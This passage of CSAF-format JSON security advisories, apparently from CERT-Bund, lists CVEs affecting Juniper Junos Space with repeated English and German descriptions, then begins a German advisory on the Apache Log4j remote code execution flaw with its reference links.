escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." 
} ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-8696" }, { "cve": "CVE-2020-8698", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-8698" }, { "cve": "CVE-2020-9490", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. 
Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-9490" }, { "cve": "CVE-2021-20254", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-20254" }, { "cve": "CVE-2021-22555", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. 
An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-22555" }, { "cve": "CVE-2021-22901", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-22901" }, { "cve": "CVE-2021-2341", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. 
The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2341" }, { "cve": "CVE-2021-2342", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." 
} ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2342" }, { "cve": "CVE-2021-2356", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2356" }, { "cve": "CVE-2021-2369", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. 
Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2369" }, { "cve": "CVE-2021-2372", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2372" }, { "cve": "CVE-2021-2385", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. 
An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2385" }, { "cve": "CVE-2021-2388", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2388" }, { "cve": "CVE-2021-2389", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. 
The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2389" }, { "cve": "CVE-2021-2390", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." 
} ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-2390" }, { "cve": "CVE-2021-25214", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-25214" }, { "cve": "CVE-2021-25217", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. 
Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-25217" }, { "cve": "CVE-2021-27219", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-27219" }, { "cve": "CVE-2021-29154", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. 
An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-29154" }, { "cve": "CVE-2021-29650", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-29650" }, { "cve": "CVE-2021-31535", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. 
The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-31535" }, { "cve": "CVE-2021-32399", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." 
} ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-32399" }, { "cve": "CVE-2021-33033", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-33033" }, { "cve": "CVE-2021-33034", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. 
Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-33034" }, { "cve": "CVE-2021-3347", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-3347" }, { "cve": "CVE-2021-33909", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. 
Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-33909" }, { "cve": "CVE-2021-3653", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-3653" }, { "cve": "CVE-2021-3656", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. 
Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-3656" }, { "cve": "CVE-2021-3715", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." 
} ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-3715" }, { "cve": "CVE-2021-37576", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-37576" }, { "cve": "CVE-2021-4104", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. 
Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-4104" }, { "cve": "CVE-2021-42550", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-42550" }, { "cve": "CVE-2021-44228", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. 
Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-44228" }, { "cve": "CVE-2021-45046", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2021-45046" } ] }
wid-sec-w-2022-0351
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "kritisch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "Apache log4j ist ein Framework zum Loggen von Anwendungsmeldungen in Java.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Apache log4j ausnutzen, um beliebigen Programmcode auszuf\u00fchren.", "title": "Angriff" }, { "category": "general", "text": "- UNIX\n- Linux\n- Windows\n- CISCO Appliance\n- Juniper Appliance\n- NetApp Appliance\n- Native Hypervisor\n- Applicance\n- Sonstiges\n- Hardware Appliance", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2022-0351 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2021/wid-sec-w-2022-0351.json" }, { "category": "self", "summary": "WID-SEC-2022-0351 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0351" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2022-225 vom 2022-12-09", "url": "https://alas.aws.amazon.com/AL2022/ALAS-2022-225.html" }, { "category": "external", "summary": "Red Hat Bugzilla - Bug 2030932 vom 2021-12-09", "url": 
"https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "GitHub Security Advisory GHSA-jfh8-c2jp-5v3q vom 2021-12-09", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "GitHub: CVE-2021-44228 Remote Code Injection In Log4j vom 2021-12-10", "url": "https://github.com/jas502n/Log4j2-CVE-2021-44228" }, { "category": "external", "summary": "Apache log4j Security Advisory vom 2021-12-10", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "Tweet von Deutsche Telekom CERT vom 2021-12-10", "url": "https://twitter.com/DTCERT/status/1469258597930614787" }, { "category": "external", "summary": "CERT-EU Security Advisory 2021-067 vom 2021-12-10", "url": "https://media.cert.europa.eu/static/SecurityAdvisories/2021/CERT-EU-SA2021-067.pdf" }, { "category": "external", "summary": "Elastic Security Announcement ESA-2021-31 vom 2021-12-13", "url": "https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476" }, { "category": "external", "summary": "ExtremeNetworks Vulnerability Notice VN-2020-465 vom 2021-12-12", "url": "https://extremeportal.force.com/ExtrArticleDetail?an=000100806" }, { "category": "external", "summary": "VMware Security Advisory VMSA-2021-0028 